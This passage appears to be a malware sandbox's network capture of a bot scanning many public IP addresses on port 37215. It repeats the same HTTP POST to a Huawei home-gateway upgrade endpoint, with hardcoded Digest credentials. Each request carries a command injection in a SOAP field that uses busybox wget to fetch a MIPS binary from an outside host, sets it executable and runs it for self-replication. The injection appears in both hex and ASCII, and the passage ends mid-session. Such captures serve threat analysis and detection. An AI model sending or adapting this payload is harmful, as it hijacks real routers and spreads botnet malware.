                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1358192.168.2.1535346197.241.115.6237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.804136038 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1359192.168.2.155026662.62.41.8237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.831619024 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1360192.168.2.154145841.4.19.3437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.831639051 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1361192.168.2.1549738157.190.110.1737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.831661940 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1362192.168.2.1536292197.142.12.2837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.831701040 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1363192.168.2.154574641.21.96.12937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.831715107 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1364192.168.2.15482984.80.143.3537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.831737995 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1365192.168.2.1533124157.229.106.13537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.831768990 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1366192.168.2.155781268.138.33.15537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.836517096 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1367192.168.2.1554988157.29.62.18737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.836534977 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
